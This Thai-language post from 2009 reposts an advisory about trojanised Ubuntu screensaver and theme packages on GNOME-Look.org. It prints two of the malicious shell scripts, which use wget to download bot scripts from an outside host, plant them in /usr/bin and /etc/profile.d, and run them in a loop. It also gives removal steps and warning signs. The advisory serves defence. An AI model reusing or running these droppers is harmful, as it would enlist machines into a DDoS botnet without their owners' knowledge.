28. December 2009 - 21:01 — iaee
ขอยกบทความของ akedemo เอาไว้เป็นอุทหรณ์ posted วันพฤหัส 10 ธันวาคม 2009 ที่มาจาก http://akedemo.wordpress.com/2009/12/10/malwares-attack-ubuntu
สำหรับผู้ใช้ Ubuntu (และ GNU/Linux อื่นๆ) ที่เคยคิดว่า OS ของตัวเอง “ปลอดภัย 100%” เลยย่ามใจชอบคลิกติดตั้งอะไรมั่วซั่ว (เขียนอะไรเนี่ย เข้าตัวเองหมดเลย 
) โปรดระวังตัว ตอนนี้เริ่มมีคนสนใจทำ Malware สำหรับ Ubuntu แล้ว และไม่ใช่ Virus ที่รันผ่าน WINE ด้วย คราวนี้ของจริง
เมื่อวานนี้ มีคนใน Ubuntuforums ว่าเจอพฤติกรรมแปลกๆ จากไฟล์ .deb ที่ดาวน์โหลดมาจาก GNOME-Look.org ไฟล์แรกเป็น Screensaver ชื่อ “Waterfall” ต่อมาก็พบไฟล์โจทย์อันที่สองคือ Theme ที่ใช้ชื่อว่า “Ninja” ทั้งสองไฟล์นี้แฝง code ประหลาดๆ เอาไว้แทนที่จะเป็นไฟล์ติดตั้ง Screensaver หรือ Theme อย่างที่อ้าง ลักษณะ code ที่มีคนแจ้งไว้ใน http://ubuntuforums.org/showthread.php?t=1349678 มีลักษณะดังนี้
01 | #!/bin/sh |
02 | cd /usr/bin/ |
03 | rm Auto.bash |
04 | sleep 1 |
05 | wget http://05748.t35.com/Bots/Auto.bash |
06 | chmod 777 Auto.bash |
07 | echo ----------------- |
08 | cd /etc/profile.d/ |
09 | rm gnome.sh |
10 | sleep 1 |
11 | wget http://05748.t35.com/Bots/gnome.sh |
12 | chmod 777 gnome.sh |
13 | echo ----------------- |
14 | clear |
15 | exit |
ซึ่งจากการสืบค้นของ นักสืบ Pantip เอ๊ย ไม่ใช่ สมาชิกใน Ubuntuforums ก็พบว่า Script ทั้งหลายใน .deb package ดังกล่าวคือคำสั่งในการควบคุมเครื่องเหยื่อให้กลายเป็น bot สำหรับยิง DDoS ถ้าพูดกันง่ายๆ ตามภาษาของ OS ที่โดนเจาะจนพรุน (ซึ่งคุณก็รู้ว่าคือ OS อะไร) นี่คือไฟล์ Trojans สำหรับ Ubuntu นั่นเอง (และอาจจะมีผล GNU/Linux สาย Debian ตัวอื่นๆ ด้วย)
ถ้าเกิดมีคนไหนเผลอเอา Theme หรือ Screensaver ดังกล่าวมาลงไปแล้ว หรือ ไม่แน่ใจว่าเคยเผลอเอามาลงหรือเปล่า อย่าเพิ่งตกใจ เพราะวิธีแก้ไม่ยาก แค่รันคำสั่งข้างล่าง
sudo rm -f /usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh index.php run.bash && sudo dpkg -r app5552
แต่อย่าไปรันคำสั่งนี้มั่วซั่ว กรุณามั่นใจก่อนว่าเครื่องคุณมี Trojans ตัวนี้จริงๆ ลักษณะสังเกตก็ไม่น่าจะยาก ตั้งสติแล้วทบทวนดูว่า
- คุณเคยลง Theme หรือ Screensaver ที่เป็น .deb แต่ไม่มีรายการโผล่ Theme หรือ Screensaver อันใหม่ขึ้นมาให้เลือกหรือเปล่า
- ลองเช็คใน System Monitor ดูว่าเครื่องคุณมีการรันโปรแกรมหรือสคริปต์ประหลาดๆ ที่ไม่รู้จักหรือเปล่า
- และสคริปต์ดังกล่าวไปเรียกดาวน์โหลดหรือยิง packets ไปที่ไหนหรือไม่
- ลองหาดูว่ามีไฟล์ /usr/bin/Auto.bash, /usr/bin/run.bash, /etc/profile.d/gnome.sh เหล่านี้อยู่ในเครื่องหรือเปล่า ถ้ามีลองเปิดดู (เปิดกับ text editor นะ อย่าไปกด Run) ว่าข้างในมีลักษณะคล้ายๆ แบบนี้หรือไม่
01 | while : |
02 | do |
03 | rm /usr/bin/run.bash |
04 | cd /usr/bin/ |
05 | wget http://05748.t35.com/Bots/index.php |
06 | wget http://05748.t35.com/Bots/run.bash |
07 | sleep 4 |
08 | rm index.php |
09 | chmod 755 run.bash |
10 | command -p /usr/bin/run.bash |
11 | done |
ถ้าทุกอย่างตรง โดยเฉพาะสองข้อหลัง ให้รู้ตัวไว้เลยว่าเครื่องคุณ “โดน” ซะแล้ว หลังจากรันคำสั่งแก้ไขแล้ว เพื่อความปลอดภัยขั้นสูงสุด ควรจะไปอ่านรายละเอียดจากกระทู้นี้ http://ubuntuforums.org/showthread.php?t=1349801 ใน Ubuntuforums ด้วย
ที่มา
- http://www.omgubuntu.co.uk/2009/12/malware-found-in-screensaver-for-ubuntu.html
- http://www.omgubuntu.co.uk/2009/12/yet-more-malware-found-on-gnome-look.html
ป.ล. อ่านเรื่องนี้แล้ว อย่าเพิ่งด่วนสรุปว่า Linux ไม่ปลอดภัย เพราะว่านี่ไม่ใช่การเจาะผ่านช่องโหว่ของ OS หรือของโปรแกรมใดๆ ทั้งสิ้น แต่เป็นการเจาะผ่านช่องโหว่ตัวสำคัญในระบบ คือ… ผู้ใช้ นั่นเอง หรือจะเรียกว่าเป็น Social Engineering รูปแบบหนึ่งก็ได้ ซึ่งทุก OS ในโลกมีโอกาสโดนเจาะแบบนี้เท่าเทียมกันหมด
ตรงกันข้าม อาจจะมองในอีกแง่ได้ด้วยว่า ธรรมชาติที่เป็น Open Source และชุมชนผู้ใช้เป็นสิ่งที่ทำให้ GNU/Linux OS แข็งแกร่งและปลอดภัยกว่า OS อื่นๆ ที่เป็น Closed source, Proprietary มากมาย เพราะการเผยแพร่ Source code ทำให้ผู้ใช้ทุกคนช่วยกันสอดส่องมองหาโปรแกรมที่ประพฤติตัวแปลกๆ ได้ ผลที่ได้ก็คือ ไม่ว่าจะเป็นช่องโหว่, malwares หรือ trojans สามารถถูกตรวจพบและแก้ไขได้อย่างรวดเร็ว เพื่อยืนยันความจริงข้อนี้ ผมขอบอกว่า ภายในเวลาไม่ถึง 24 ชั่วโมงนับจากมีคนตรวจพบ ไฟล์ทั้งสองได้ถูกลบออกจาก GNOME-Look.org เรียบร้อยโรงเรียนลินุกซ์ไปแล้ว
หลังจากนี้ก็ต้องมาดูกันว่า เว็บ GNOME-Look.org และผองเพื่อนในเครือ Opendesktop.org จะมีมาตรการในการป้องกันการกระทำผิดลักษณะนี้อย่างไร
